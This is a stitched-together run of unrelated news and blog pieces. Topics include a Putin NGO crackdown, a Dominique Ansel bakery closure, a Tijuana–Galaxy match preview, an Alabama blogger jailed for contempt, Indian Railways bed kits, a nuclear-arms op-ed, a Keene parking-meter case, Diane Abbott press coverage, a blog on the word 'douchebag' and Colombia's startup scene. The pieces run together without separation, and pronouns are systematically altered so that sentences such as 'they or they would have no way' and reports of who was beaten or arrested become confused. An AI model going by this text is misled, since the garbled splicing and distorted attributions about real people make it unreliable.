Get the Monitor Stories you care about delivered to your inbox. By signing up, you agree to our Privacy Policy
Six years ago, in a wave of "anti-terrorist" measures, Putin launched a sweeping crackdown on politically-active NGOs, which winnowed their numbers and limited their ability to operate in Russia.
"Clearly on display in this article are Putin's very strong suspicions toward civil society. They see foreign-funded NGO's being utilized by unfriendly powers and basically stated that they should not be allowed to exist," says Mr. Suslov. "You don't have to read deeply between the lines to worry that we may see a fresh assault on NGO's after the election. It's a very worrisome signal."
Original photo by Thomas Garry
Last week Dominique Ansel Bakery was shut down by the Department of Health after a video showed a mouse running around behind the counter. It was a tough break for Cronut lovers, but even tougher for the tiny Spring Street bakery that quickly became a media darling over the past year. While Dominique Ansel and their team—who have been working tirelessly, we're told, on remedying this—had hoped to be open again sometime today, they are currently still closed.
A rep for the bakery, Amy Ma, told us this morning over email, "The DOH did not find a single mouse or any rodent here at all. So much of what they cited as 'evidence of infestation' were cracks and holes on the walls that they saw as structural risks." Ma added they are "just waiting for our re-inspection... [which] should happen today."
The Health Department spokesperson told us this morning that "in order to conduct a re-opening inspection, Dominique Ansel Bakery will need to submit a pest control plan," which they have not turned in yet. And when asked if they could clarify what shut the bakery down, they did not mention cracks or structural risks, rather: "What made the infestation severe was that the health inspector found several hundred mouse droppings."
When we asked Ma about the DoH's comment on mouse droppings today, they told us, "We're of course deeply apologetic to hear there were mice droppings found. It is something that came as a shock and disappointment to us as we have regular deep cleaning scheduled. We worked tirelessly to develop a permanent upgrade, including a full re-cementing and refurbishment to provide a pristine environment for our customers and staff. All our kitchens are opened so people can see the entire food preparation process in full view and our commitment to quality and cleanliness. Please note that none of the mice droppings were found in our kitchen areas where food preparation is done. And there were ZERO mice or any rodents found by the DOH."
Back in October the bakery was also cited for "evidence of live mice present," though they were given an A rating at the time.
The trip to Los Angeles to face the Galaxy is the shortest road trip Tijuana has made in recent memory. Will it help improve Xolos' woeful away form?
Follow GOAL.COM on
Tijuana hopes its shortest road trip in years will end its long away drought when the club faces the LA Galaxy on Wednesday in the first leg of a CONCACAF Champions League quarterfinal.Xolos haven't won away from Estadio Caliente in any competition since August of 2013, though the 3-2 win against Victoria wasn't played at the hosts' home stadium. In Liga MX, it's been since January 20, 2013 when Tijuana beat Pumas.But being located just minutes from Southern California and only a few hours drive from the StubHub Center might help Xolos, whose road trips usually involve much lengthier travel without crossing international borders.Tijuana's new manager, Cesar Farias, has found more success than their predecessor but still hasn't been able to find the formula Antonio Mohamed did when they took the club to a Liga MX Apertura title and advanced deep into the Copa Libertadores. Farias has, however, returned the club to more of an attacking, free-flowing style - if only the forwards would take notice. Cristian Pellerano, a midfielder, leads the team in goals with five in the Clausura.The Galaxy, for their part, are ready Xolos to bring that style.“They're a little difficult to pick up at times because in some instances they're all over the field, some of their players when they're attacking,” Galaxy midfielder Landon Donovan said at a news conference Tuesday. “I think the key for us is that when we're in possession, we take advantage of the spaces that are left open if they do that.”Donovan and striker Robbie Keane, who had a late penalty saved in a 1-0 defeat to Real Salt Lake on Saturday, have the tools to trouble a Tijuana defense that has looked exploitable at times, though a clean sheet in Friday's win against Chivas moved Xolos back into the Liguilla positions.The Galaxy had a wealth of chances in their loss Saturday but couldn't get any shots past Nick Rimando. New addition Samuel could be key if Donovan or Keane can't get on the scoresheet, and a good performance from Juninho would also boost the MLS outfit.Emotions should be high for the match and fans from both teams are expected to fill the stadium. Thanks to the close geography, there are fans of both teams in the region. Location is also why these teams are consistently battling each other for youth players with young forward Paul Arriola's decision to sign with Xolos still a sore subject for some in LA.The Galaxy went unbeaten in Group 8 to advance to the knockout stage, with Tijuana emerging from Group 7 with a 3-1-0 record.
BIRMINGHAM, Alabama–In a case troubling to free speech advocates, an Alabama journalist who blogged about allegations of a sordid affair between a powerful Republican scion and a lobbyist has been arrested and now sits in jail on contempt charges.
A judge has taken the extraordinary steps of not only sealing the file in the case, but ordering that the blogger's posts be removed from the Internet.
Roger Shuler, 56, was arrested Oct. 23 on a warrant by deputies who were waiting when they returned to their Birmingham home from a trip to the local library.
Their wife, Carol Shuler, told WhoWhatWhy that they were beaten and Maced by deputies who cornered them in their garage. Their booking photo from the Shelby County Jail shows their left eye swollen shut.
For three weeks, they have sat behind bars in the county lockup in Columbiana, Alabama, held without bail on two counts of contempt of court and the add-on charge of resisting arrest.
Prior to their arrest, Shuler blogged that they were attempting to evade being served papers and forced into court. They claimed the attempts were illegal and therefore invalid on jurisdictional and technical legal grounds.
Randall Marshall, legal director of the American Civil Liberties Union of Alabama, which is involved in the case, acknowledged that Shuler “didn't do themselves any favors.”
Still, the ACLU and others argue that Shuler's jailing raises fundamental constitutional questions about prior restraint, secretive court proceedings and the covert power of legal and political cronyism in this Deep South state.
“This issue is important to journalists because they should not have to face jail over something they wrote,” Gregg P. Leslie, legal defense director of the Reporters Committee for Freedom of the Press, told WhoWhatWhy. “This goes beyond traditional reporters and bloggers — no one should be held in contempt of court and jailed for not taking something off of an Internet site, at least and until they have a chance to defend it in court and there's a final court order finding it libelous. Even then, the punishment under libel laws is a monetary award to the injured party, not a coercive demand to stop speaking.”
Blog Alleges Affair, Abortion
The case is rooted in Shuler's allegations of an affair in about 2006 between a scion of one of Alabama's elite political families, Robert Riley, Jr., and Liberty Duke, a registered lobbyist in Alabama. Riley is a Birmingham lawyer and son of Bob Riley, a nationally prominent Republican who served as governor of Alabama from 2002 to 2010.
Shuler reported on their “Legal Schnauzer” blog that Duke got pregnant, and “Republican insiders” paid them as much as $300,000 to have an abortion and to “stay quiet on the subject.” Both Riley and Duke were married with children at the time of the alleged affair, though Duke was soon sued for divorce by their husband.
In late July, a few weeks after Shuler reported those details, Riley and Duke filed a defamation lawsuit against the journalist. Both have denied having a sexual relationship.
Judge Claud Neilson of Demopolis, Alabama, came out of retirement to preside over the case. They were appointed to the task by Roy Moore, the controversial state Supreme Court chief justice and a key player in GOP strategist Karl Rove's Republican makeover of the Yellowhammer State's high court.
IMAGE: Bob Riley IMAGE: Liberty Duke IMAGE: Robert Riley, Jr.
IMAGE: Karl Rove IMAGE: Judge IMAGE: Bill of Rights IMAGE: Dog
Where else do you see journalism of this quality and value? Please help us do more. Make a tax-deductible contribution now.
Our Comment Policy Keeps it civilized, keep it relevant, keep it clear, keep it short. Please do not post links or promotional material. We reserve the right to edit and to delete comments where necessary. Related print
Have you ever travelled in AC sleeper class on a train and not worried about the cleanliness of the bedsheets, blankets and pillows offered to you? That is set to change.
Have you ever travelled in AC sleeper class on a train and not worried about the cleanliness of the bedsheets, blankets and pillows offered to you? That is set to change. The next time you book your train ticket you could be asked if you'd like a clean, new bed kit, comprising a towel, a single sheet, a double sheet and a pillow cover that you could take home with you after the journey, Indian Railways is looking to source these pure cotton bed kits from the Khadi and Village Industries Commission (KVIC) and offer them to passengers travelling in its air-conditioned (AC) sleeper coaches at a nominal Rs 250 per kit. Two railway officials, requesting anonymity, confirmed that the idea is being examined and a final decision on it will be taken by the end of December. The concept of takeaway bed kits and sourcing these from KVIC was mooted by railway minister Piyush Goyal during a meeting in early October. Incidentally, Prime Minister Narendra Modi in their monthly ‘Mann ki Baat' radio speech on 24 September had urged the people to support the growth of the Khadi industry by using clothes made out of the fabric, which in turn will create employment for the poor. “I am hopeful that the railways will be able to give a choice to passengers while buying tickets to pay and buy bed kits. The kits will be delivered to buyers before the journey begins,” said one of the officials, adding that the cost of the bed kit is likely to be around Rs 250.
The railways will continue to provide pillows and blankets to all passengers, irrespective of whether they opt for the takeaway kit or not. However, the railways is also considering offering blankets with covers so that these can be washed and a fresh cover provided to passengers. At present, blankets are provided without covers and passengers often complain about them not being clean. Linen for 2AC and 3AC passengers are presently sourced from a private supplier, AAKASH, while in 1AC Khadi linen from KVIC is provided. The bed kits procured from AAKASH cost Rs 160 each, while those from KVIC cost about Rs 425. At present, there are about 1 lakh bedsheets in circulation in the Indian Railways with 60% of them being used in 3AC, and the rest in 2AC and 1AC. While the rolling out of the buy-your-bed-kit programme seems like a promising idea, there are certain challenges. “Problem is after people buy it once — especially frequent travellers — will they be willing to buy again? Also, the volume is huge and there is no such model in the world which we can simply follow,” said the official quoted above.
“If we make the kit purchase optional, we need to consider the logistics as well, because in the same train we will have to offer both takeaway and railway linen. Also, for bookings that are done at the last moment, there will be a small time window to arrange the kits,” said another railway official. IRCTC has been offering an e-bedroll takeaway service, which offers a bed kit and blanket for Rs 250. Though there is no official figure available, the railway officials FE spoke to said there have been few takers. The railways are also experimenting with the concept of doing away with bedrolls altogether and just adjusting temperatures inside the coaches depending on the weather conditions.
“The experiment of temperature adjustment is on but the problem will arise in winter. In winter, temperature will have to be increased through heaters and this poses a fire-safety issue, as heaters will have to be installed,” said the second official cited above. As temperatures vary across the country, the railways will need a universal solution, which suits all railway zones. “The real test will be when peak winter will arrive and the test will be to maintain a constant 24-25 degree Celsius,” added the official. Given where things stand today, it is quite likely that you'll get to buy that crisp and clean Khadi sheet to sleep on during your next train journey. And the unseen handloom weavers will thank you for your business and wish you a happy journey.
Americans are in near-panic over the danger posed by Islamic terrorists. That danger, however, pales beside an emerging new one. President Obama has proposed a frighteningly wrongheaded plan to "modernize" our nuclear arsenal at the unfathomable cost of about $1 trillion over the next 30 years. Terror will never reach even 1 percent of our population. Nuclear "modernization" increases the prospect of true devastation.The nuclear threat seems diffuse and faraway, while the prospect of a deranged fanatic shooting up a cinema is as vivid as today's news. Perhaps we have been lulled into security by the fact that no nuclear weapon has been used since 1945. Voices trying to alert us to the true threat are drowned out in a frenzy of over-the-top campaign speeches and TV rants about crazed Muslims.The most sobering of these voices belongs to William Perry, who during the 1970s and '80s directed the development of air-launched nuclear cruise missiles and later became secretary of defense. Now Perry is campaigning against Obama's plan to develop and buy 1,000 new missiles with adjustable nuclear capacity, 100 new long-range bombers, and a new fleet of nuclear-armed submarines. They warn that if the plan becomes real, disputes among nations will be "more likely to erupt in nuclear conflict than during the Cold War."When Perry was directing America's last nuclear buildup, they and others argued that it was necessary to compensate for NATO's relatively weak conventional power in countries around the Soviet Union. That rationale evaporated when the Cold War ended, but it still shapes our defense policy.. It is especially upsetting to Russia, which already feels under increasing American threat as a result of our military maneuvers on its borders and the fact that many of our missiles are positioned in Germany, Turkey, and other countries near its territory.The cruise missiles Obama wants to build could be used to deliver either conventional or nuclear payloads. If an air defense controller in another country sees one incoming on radar, they or they would have no way of knowing whether it was armed to destroy a building or an entire city. The temptation to launch nuclear retaliation could be irresistible.Proliferation of nuclear weapons also increases the possibility that one will fall into the hands of terrorists. Perry has their own "nuclear nightmare, born of long and deep experience." In it, a gang secures enough uranium for a rudimentary bomb, slips it into Washington, and detonates it on Pennsylvania Avenue. "And yet," Perry laments, "while this catastrophe would result in a hundred times the casualties of 9/11, it is only dimly perceived by the public."Besides these grave dangers — global proliferation, accidental war, and nuclear terror — there is another: national bankruptcy.Now is the time to stop this program. So far, enthusiasm for it is confined to the White House and Pentagon. Once it is launched, rich procurement contracts will be portioned out to the districts of influential members of Congress. That will produce a self-interested constituency and give the project unstoppable momentum.Nuclear weapons are useful for deterrence only.. Most depressing, the proposal for this investment comes from a president who campaigned on a pledge to reduce and seek to eliminate nuclear weapons — and who won a Nobel Peace Prize for their apparent sincerity. Keeping our country safe requires agile thinking, not reliance on policies shaped for a bygone age.
Police find bogus Pike River miner
FOUND: Police released this photo of a man alleged to have conned a North Otago family. Relevant offers
The man who allegedly posed as a Pike River miner to steal cash, clothes and a car from a North Otago family has been remanded in custody after appearing in the Timaru District Court.
Constable Craig Bennett, of Kurow, said the man was picked up by police in Timaru this morning and was charged with unlawful taking from the Tokarahi family they befriended.
A warrant for their arrest had also been issued in relation to other matters, Bennett said.
They were remanded in custody and would appear in the Christchurch District Court on January 28.
Bennett said the man had previously posed as a Pike River miner.
Police located the man after a tip off from a member of the public after the story appeared in the media this morning.
Bennett said a person read the story and realised the man was staying with family members and contacted police.
The man was hitchhiking from Dunedin on Christmas Eve when they were befriended by a family from Tokarahi, about 35 kilometres from Oamaru.
Bennett said they claimed to be a Pike River miner who had recently separated from their wife. They said the man stayed with the family for two days before leaving at night with their car and more than $2000 in cash and cheques.
The man left a note saying they were doing a "small job", but had not returned.
The family had given "everything extra that they had", including hosting the man on Christmas Day. "They actually bought a Christmas present for them because they felt sorry for them spending Christmas alone, and lent them some money to try to help them get back on their feet," Bennett said.
They said the theft had upset a "nice family".
They were not likely to fall victim easily, but the man's story was "very thorough".
They said the man was wanted by police in relation to the theft of a red 1996 Subaru Imprezza, registration DAH599, and the cashing of a $1250 cheque in Oamaru.
The vehicle would be returned to the family this afternoon, Bennett said.
- The Press
taking into consideration the governmental interest that would be served, the trial court weighed the benefits of the requested relief against the effect that relief would have on the respondents' constitutionally protected speech, and, based upon the factual record before it, exercised its equitable discretion to deny the proposed injunction.
More than three years after the City of Keene filed suit against Keene's “ Robin Hooders ” (the activists who've saved motorists from thousands of parking tickets by feeding expired meters), the case has finally come to a close – at least within the New Hampshire court system. In a short four-page order issued just before Christmas, the NH supreme court affirms the Cheshire superior court's decision to deny the city's request for an unconstitutional injunction they've been begging for since 2013:
We won! (Again!) Presuming the city gang does not decide to continue lavishing taxpayer dollars on their expensive private attorneys to take the case to federal court, it should end here. We've yet to see the total cost of the several court appearances the city has made, but then-city-manager John MacLean admitted in 2013 that the first round (of four) cost about $20,000. Their private attorneys billed them so much, that on this final round at the supreme court they were claiming to have taken the case “pro bono”. Another way to say that is that the city paid tens-of-thousands for the first three rounds in court and got the fourth free.
All the while free speech attorney Jon Meyer of Manchester truly did take the Robin Hooders' case pro-bono, the entire time. Their talent is legendary and they not only brilliantly defended the peaceful activists but proved without a doubt that the city's parking enforcers were dishonest and ridiculous. There was never any evidence presented that the accused Robin Hooders had “threatened, intimidated, or harassed” the city employees. As if to prove how ridiculous their claims were, parking enforcer Jane desperately stated that anything Garret said, even talking to them about the weather, they considered to be “taunting” . It was laughable but also very serious – the city gang was lying to try to get the judge to order us to stay 50 feet away from the enforcers.
Eventually the city whittled their 50 foot request down to 30, then 10-15 feet, then down to anything they could get the court to give them. They also whittled down the number of respondents over time from six to two. At no point was an injunction issued, though Robin Hooding dropped off in frequency during these cases, as most of the respondents had moved away from the area due to life changes.
I've been asked to predict what the court would do, and I've never claimed to know. Frequently courts do not side with freedom, but I'm grateful when they do. In this case, at every step along the way, the courts of New Hampshire have sided with freedom of speech, over-and-over again denying the city's request for injunction that was clearly intended to violate our rights. Hopefully the city gang will give up on their futile, expensive quest to stop the peaceful Robin Hooders from continuing to save innocent motorists from the King's parking tariff. If they appeal to federal court, you'll find out the details here at Free Keene.
When right-wingers- especially right-wingers running newspapers – find a metaphorical dead horse to flog, they really put their back into it, don't they?
Editors of the Daily Mail, The Sun and the Daily Express took it upon themselves to misrepresent Diane Abbott after they spoke up about rioting that has taken place in London after the death of Rashan Charles, a 20-year-old man who died after being “restrained” by police.
The trouble started shortly after around 150 people gathered in Dalston, near where Mr Charles was tackled by officers on July 22.
Protesters threw bottles at police and barricaded Kingsland Road, a long main road which runs past the police station where the protest started peacefully and also through the area where Mr Charles died. The disorder is said to have lasted around an hour, between 10pm and 11pm on Friday (July 28).
The Metropolitan Police said a 17-year-old boy was arrested on suspicion of causing grievous bodily harm, while a police officer suffered an eye injury but remained fit for duty.
Ms Abbott, in whose Hackney North and Stoke Newington constituency the rioting took place, put out a press release saying: “The anger and upset at the death of Rashan Charles is understandable. But Rashan's family have explicitly spoken out against hostile actions. We must respect their wishes and any protests must be peaceful.”
The Express misrepresented them with this headline: “‘It's understandable!' Diane Abbott defends anger as violent rioters HIJACK protest“.
Of course, Ms Abbott wasn't saying that rioting was “understandable”. They said “anger and upset” was. They were asking for protesters to respect the wishes of Mr Charles's family – in fact advocating peaceful protest, not “hostile actions”.
Ms Abbott themselves responded to similar lies in the Mail –
Today's @MailOnline claims I defended the hurling of petrol bombs at Police! Here's their headline vs what I actually said. I am disgusted pic.twitter.com/z7RtP6GVrd — Diane Abbott (@HackneyAbbott) July 29, 2017
– and also in The Sun:
And @TheSun follows suit! Again Me vs the headline. Any unrest in our communities is serious. Not a 'click-bait' game. Report with respect. pic.twitter.com/vnkvK0PTku — Diane Abbott (@HackneyAbbott) July 29, 2017
Perhaps these right-wing propagandists have been emboldened by the apparent success of the Tory Party lie that Jeremy Corbyn promised to write off student debts if elected into office in June. In fact, they said no such thing and there was no such promise in the Labour Party manifesto.
Another recent right-wing lie is the Tory claim that parents having a job lifts children out of poverty, when in fact the rise in the number of working families simply means there has been an increase in working-household poverty.
They try to pretend that valid arguments – like those presented in a recent Momentum video about the selective amnesia suffered by certain middle-class Tory voters about the help they had to become comfortably wealthy – are “hateful” attacks on bourgeois “caricatures”, but are able to mount no coherent argument against its claims.
And does anybody remember the squawks of upset after This Site pointed out the political aspects of the disastrous fire that engulfed Grenfell Tower last month? Again, this had no basis in fact – the fire happened because safety regulations had been relaxed to the point where landlords could put flammable cladding on the building without being questioned over it, while neither council chiefs nor MPs reviewed safety rules.
Yes, it seems I was the first to point out specifically that there was a political angle to the disaster, on the morning after it happened. The Tories and their lapdogs in the press only picked up on articles that followed in other sites, again claiming that these criticisms were inappropriate.
And yet now – because of pressure from myself and the others – it's the only story to be told about Grenfell.
Perhaps the uptight right believes Ms Abbott is fair game because they have carried out a few poor performances, notably in a radio interview about police funding and personnel. It was what's known as a “gotcha” interview – one in which politicians are criticised for failing to memorise relevant information about a policy, rather than for the policy itself. Many Conservative politicians suffered the same fate in the run-up to the general election, but did not receive nearly as much negative attention.
It was later revealed that the MP has been suffering from a long-term illness – but This Writer does not recall seeing any apologies from the gutter newsrags.
Really, the tone of political debate needs to be improved, and massively.
Emotion-based, evidenceless claims from the right are pointless; we can all look up the facts.
And personal attacks that deliberately misrepresent comments by any politician are also ridiculous, because they can use the social media – as Ms Abbott has – to dismiss these claims, almost before the printing presses have finished churning out hard copies of the lies.
The choice facing the right-wing media is very simple, then:
Shape up – or shut up.
Here are four ways to be sure you're among the first to know what's going on.
1) Register with us by clicking on ‘Subscribe' (in the left margin). You can then receive notifications of every new article that is posted here.
2) Follow VP on Twitter @VoxPolitical
3) Like the Facebook page at https://www.facebook.com/VoxPolitical/
Join the Vox Political Facebook page.
4) You could even make Vox Political your homepage at http://voxpoliticalonline.com
And do share with your family and friends – so they don't miss out!
If you have appreciated this article, don't forget to share it using the buttons at the bottom of this page. Politics is about everybody – so let's try to get everybody involved!
Vox Political needs your help!
If you want to support this site
(but don't want to give your money to advertisers)
you can make a one-off donation here:
Buy Vox Political books so we can continue
fighting for the facts.
The Livingstone Presumption is now available
in either print or eBook format here:
Health Warning: Government! is now available
in either print or eBook format here:
The first collection, Strong Words and Hard Times,
is still available in either print or eBook format here:
Share this: Facebook
Twitter
LinkedIn
Tumblr
Email
Print
Reddit
Pinterest
Like this: Like Loading...
Recently, Mr. Belinkie had the brilliant idea of writing a post about that ubiquitous insult, “douchebag,” but they thought I, being the “resident third wave feminist,” should have the honors.
In reality, I hadn't really thought much about the word until they asked me to write the post, and I hadn't thought of it in a feminist perspective until they reminded me how I've written myself into the “angry feminist” corner of this blog. Oh well.
But it brought to mind important questions:
1. What in the world is a douchebag, literally and figuratively?
2. Where did the word come from and why is it currently so popular?
3. Should feminists use the word “douchebag” or not in everyday discourse?
The answers to these burning questions below…
Douches, if you don't know, are interesting contraptions that some women stick up their cooters to spray their innards with water, vinegar (ouch), or some chemical solution in the hopes that they can wash away that icky girl smell. They come in a variety of smells (flavors?), such as Baby Powder, Mountain Breeze, Spring Rain, Island Splash, and Sweet Romance. I've never used one, nor will I for this post, because almost every doctor in the Universe agrees they are very unhealthy and that vaginas, like a good oven or a cat, are self-cleaning. Douching can actually lead to a less clean vagina, causing infection and other nastiness.
The douche contraption is made of a bag (the “douche bag”) or bottle filled with the cleansing liquid and a hose that goes up your cootch. There seems to be nothing wrong with this bag except for the fact that it is filled with the liquid of the douche.
But this isn't how we use the term “douchebag” in common parlance. A naïve suburban girl, I had never heard the term until I entered college in 2002 and learned to understand its complexities to such a degree that I was able to deliver an verbal dissertation to my mother during Spring break about the differences between a douchebag and a tool.
To me, a douchebag is an asshole. A douchebag is almost always a man, particularly an alpha-male or a wannabe alpha-male. Frat boys tend to lean towards douchey; drunken frat boys almost always cross the line (which I recently learned was called “the Feder-line,” interestingly). Douchebags may very well be smart, but they act like idiotic assholes who don't give a damn about anyone but themselves.
According to Urban Dictionary, however, there are two distinct definitions for douchebag:
A douchebag usually assumes the form of a hair-gelling pretty-boy but can also be described as an overzealous, pompous, or vexatious asshole that most people wish were killed with a Mortal Kombat fatality.
Oh ho! Those are two very different definitions. Both of these people might be assholes, but one is a feminine asshole, and one is a masculine asshole. One is insulted because they act like a stereotypical woman/gay man who cares about appearances; the other is insulted because he's the stereotype of the over-aggressive man. One is problematic because he's not masculine enough; the other because he's too masculine. Back to that distinction in a moment.
To figure out which is the “correct” definition, we need to go back to the source. It's like the old story of the zebra. Is a zebra white with black stripes or the other way around? The only way to tell is to look at the source. A baby zebra is black, so a zebra is black with white stripes.
So, to find out what the true definition of douchebag is, we need to find out where douchebags come from. What's the etymology of the insult version of douchebag? Where did it come from and why do we say it now?
Apparently, douchebag is an olde tyme insult, much like “trollop” or “dingbat.” The OED says it was first printed in the 1930s and that it was popularized in the 1950s as a term of contempt towards women.
Theoretically, then, feminists should not say douchebag, because, like “bitch” or “cunt,” it's nasty towards the female gender. Heart of Women's Space agrees that the link between these terms is fair because “douchebag,” like “bitch and “cunt,” is only insulting because it's related to women and their inferior plumbing. This argument definitely gives me pause, because I did make a conscious decision not to use the word “bitch” anymore for that very reason. I tried to give up “cunt” but ultimately decided to co-opt it with some of my friends in college. If black people can use the N-word, then we should be able to call each other “cunt muffins” and “my little cuntykins” all we want, right? Cunt power! The film, Atonement, I think, also brought back the sexy side to the word “cunt,” which is pretty neat.
I am loath to give up “douchebag,” though, because I had always used it against men who were nasty to women. I didn't mean that they were womanly; I meant that they were trying to use their patriarchal nastiness to get play. Douchebags are guys who take advantage of drunk freshmen at parties and then act all offended when someone accuses them of rape. Douchebags, in my mind, are assholes who are on the top of the social hierarchy and therefore are allowed to act as douchey as they want. Amanda Marcotte, feminist extraordinaire of Pandagon, is with me on this one, so I guess I can pull an appeal to authority and win this one.
Let's go back to physical douchebags for a second. Are they really associated with women? Sure, only women use them, as far as I know. But the fact is that douches are associated more with the patriarchy than with women themselves. The only reason women ever used douches was to clean themselves so men would like them. Men didn't like the “gross” vagina smell, so drug stores started selling douches and advertisements started telling women that if they didn't clean themselves boys wouldn't like them. So here's my argument:
-Douches=tools of the patriarchy
-Douchebags=patriarchal tools
-“Douchebag”=not offensive to women
So I'm going to continue to call people douchebags. Proudly.
Incidentally, Gawker claims that the word is overplayed and had a contest to find a replacement term. See the comments for some excellent ideas. I'd say we should just stay away from any terms derived from genitalia altogether, since genitalia are actually pretty great. “Asshat” seems to be catching on and has a nice image attached to it. “Cumstain” isn't bad, because while cum in itself isn't bad, I don't think anyone wants a cumstain. And, of course, we can't forget about “anus,” because that's where the poop comes out.
Heh. Poop.
Back to you, Belinkie.
Ten years ago, the idea that Colombia would become a burgeoning hub for any dynamic industry beyond its notorious drug trade would have struck most observers as far-fetched.
As recently as the turn of the century, conventional wisdom had it that the tropical, Andean nation was on the verge of becoming a failed state. Fast forward to the present day and Colombia already boasts one of the region's stronger startup ecosystems, with huge potential upside still waiting to be explored.
By 2018, the government hopes to have 63 percent of the country connected to broadband. And according to 2013 GSMA mobile economy figures, there are already 43.9 million mobile connections and 24 million mobile users in a country whose 47 million people give it the third largest population in Latin America and third largest Spanish-speaking population in the world.
These and other figures are highly encouraging for people looking to tap a rapidly growing market, and it follows that a stronger internal tech culture will also form the groundwork for Colombia's own aspirations in the field of innovation.
Laying the Foundation
The first stage of the government's concerted campaign to rebrand Colombia as a technology center involved drawing in IT services with tax incentives and professional training programs. A $6.8 billion industry has taken strong root as a result, with 1,800 software development and IT service companies registered in the country. Looking forward, the hope is that IT, and the investments that went into promoting it, can diversify into a broader innovation ecosystem.
With that in mind, the government has spurred a number of public initiatives to address the lack of venture capital in Colombia, currently the biggest ceiling on startup growth. Founded to support and promote tech innovation and new ventures, iNNpulsa awarded three grants of up to $800,000 in 2013 to investor groups establishing operations in Colombia.
Apps.co is another, more tech-specific, government initiative. By the end of 2014, it's expected to have awarded $33 million in funding to accelerators and university partnership programs, according to the Atlantic.
Where once there was nothing of the sort, there are now 38 private equity, venture capital or seed funds in the country.
These and other efforts have succeeded in convincing big names like Facebook and Google that a favorable labor market and budding consumer base are worth investing in, with both companies opening permanent Colombian offices in recent years. Where the government's strategy has so far fallen short, however, is in replicating that sort of international success for homegrown Colombian companies.
Examples of Colombian startups making a similar leap, or achieving sizable exits at all, are few and far between. .CO is easily Colombia's biggest startup success story, having been acquired by Neustar for $109 million in 2014. But after that, the field gets noticeably thin.
PagosOnline, an online payment platform, and Click Delivery, an online delivery service, have probably come closer than anyone else to following in .CO's footsteps, and even so, the acquisitions went for a rumored $10 million and $15 million, respectively.
The problem is that, while the startup scene is maturing, the investment economy backing it is still in its beginning stages.
“It's good to see that the government is willing to stand behind innovation and recognizes that entrepreneurship is the motor of a successful economy,”Michael Puscar, a successful venture capitalist, explains. “But everyone, including the government, recognizes that public funding can't replace private initiatives in the long run, and especially not in a fast-paced business climate like the kind startups live in.”
Bogota, the Capital
Although there is debate on which Colombian city will eventually emerge as the country's startup center, Bogota retains the title up until this point. That's hardly a surprise, of course. The capital is home to the national government, most of the country's corporate and financial institutions, and the largest and most diverse ex-pat and immigrant community in the country.
Colombia's most experienced startup founders are from Bogota, including Alex Torrenegra, a serial entrepreneur often talked about as the godfather of Colombia's startup scene. Torrenegra is the founder of VoiceBunny, a digital voice over marketplace, and one of the few Colombian startup entrepreneurs who have been able to transition to a distinguished international career.
Most importantly, their commitment to sharing insights and leadership with the Colombian startup community have set an encouraging precedent. For years and across all industries, Colombia has been on the losing end of an epic “brain drain” that has sent many of its best and brightest abroad for good. Keeping that talent in the country is a key to unlocking the country's innovation potential, and Torrenegra had done more than their fair share to set an example in that regard.
Already, we've seen a lot of knowledge brought back and put to effective work in Bogota. Looking at notable institutions like HubBOG, a co-working space and incubator led by Rene Rojas which hosts weekly events and activities, Wayra, an accelerator built loosely according to the Y Combinator model, and Endeavor, a non-profit that supports high-impact Colombian entrepreneurs, it's easy to see the influence that global perspective is having.
Other local leaders include Juan Diego Calle, founder of .CO; Alan Colmenares, considered the heart of Colombia's startup ecosystem; Catalina Ortiz, CEO of iNNpulsa, Andres Gutierrez and Juan Salcedo, founders of Tappsi; Freddy Vega and Christian Van Der Henst, founders of Mejorando.la, an educational platform that surpassed $1 million in revenue in 2013; Diego Serebrisky, a partner at the Alta Ventures venture firm; and Andres Barreto, who operates government accelerators across the country.
Medellin, The Upstart
Colombians will tell you it's no coincidence that Medellin won the most innovative city of the year in 2012. Paisas, as its residents are known, are famously business savvy and entrepreneurial–traits that carry as much promise for the future as they have darkness in the past.
The local startup scene still lags behind Bogota, but not by degrees, and the weather and business-friendly atmosphere have given it its own unique dynamic. Medellin today does not have the success stories that Bogota can refer to, but many believe that in the next decade it will become the nation's tech center. In fact, in 2013 the city government committed $389M over 10 years to technology and innovation.
The center of Medellin's innovation scene is Ruta N, which is a government organization along the lines of Apps.co and iNNPulsa. Last year, it committed $3 million to the Velum Ventures venture capital firm.
Other organizations spearheading entrepreneurship include Medellin ACI, responsible for international investment in Medellin, and Creame, a government-supported incubator.
Local leaders include Hernan Jaramillo and Roberto Cuartas, founders of TareasPlus, which raised $1.8 million in venture funding in 2012; Eduardo Quiroz of Ruta N; Esteban Velasco and Esteban Mancusco, founders of the venture capital firm Velum Ventures; Juan Sebastian Franco, head of entrepreneurship at ANDI, the locally founded business association, now the largest in the country; and Eddie Arrieta, co-founder of Espacio.
Medellin is caught in a paradox. Because it doesn't have success stories, the investor confidence needed to create new ones is low. Public initiatives have done what they can, but the current system is a weak substitute for badly needed private capital.
What's Left?
Although the startup scene is still very much concentrated in Bogota and Medellin, activity is beginning to sprout up in other regions in Colombia.
In Barranquilla, on the Caribbean coast, the startup ecosystem revolves around Koombea and its charismatic founder, Jonathan Tarud. Many of the city startups are helped by the company and its has taken a leadership role in the startup ecosystem, becoming active supporters of events such as Startup Weekend, among others. In Cali, the country's third largest city, large development companies comprise much of the tech ecosystem.
The government is working to promote activities in other cities, but the high-end spectrum of the Colombian economy in general is limited to a few cities. Expanding the tech scene, in that sense, may be as much a question of broader development as anything else.
Conclusion
Colombia has plenty of work ahead if it wants to assert itself as a legitimate global player. Looking at the bigger picture, though, Colombia does have a number of advantages on that front.
This year, Colombia's GDP has grown faster than any in Latin America — it's currently the fourth fastest growing in the world — and inflation, though up from 2013, remains low. Poverty, extreme poverty, and unemployment are all down thanks in part to tech-based programs designed to address inequality, and labor formalization is up.
So, in comparison to the other emerging Latin American tech hubs — Buenos Aires, São Paulo, Santiago — Colombia not only has competitive public incentives, but also the general structural growth that attracts immigration.
Brazil, once the darling of global experts, has become mired in economic stagnation. Argentina and Venezuela are approaching crisis conditions, and immigration to the United States is prohibitively difficult. The third-largest Spanish-speaking country in the world, Colombia is essentially fighting for prevalence with Mexico. Unlike Chile, another well-developed country, Mexico has even better relative location to the States than Colombia, but it has an image problem relating to escalating drug violence. By contrast, Colombia is moving toward an end to its 50-year armed conflict.
“At the end of the day, people just want to be here,” says Puscar. “That might sound trivial, but when you're talking about doing business, it really matters. It's a great place to live, a great place to visit. The question then is building on what's already here and letting people know how much opportunity there is.”
Editor's note: Conrad Egusa is the founder of Publicize.
Voters have to meet one of six criteria to obtain an absentee ballot by mail or in person at a clerk's office. The most common reasons are voters over age 60 or those who won't be in their hometown on Election Day. (Photo: Carrie Antlfinger / AP)
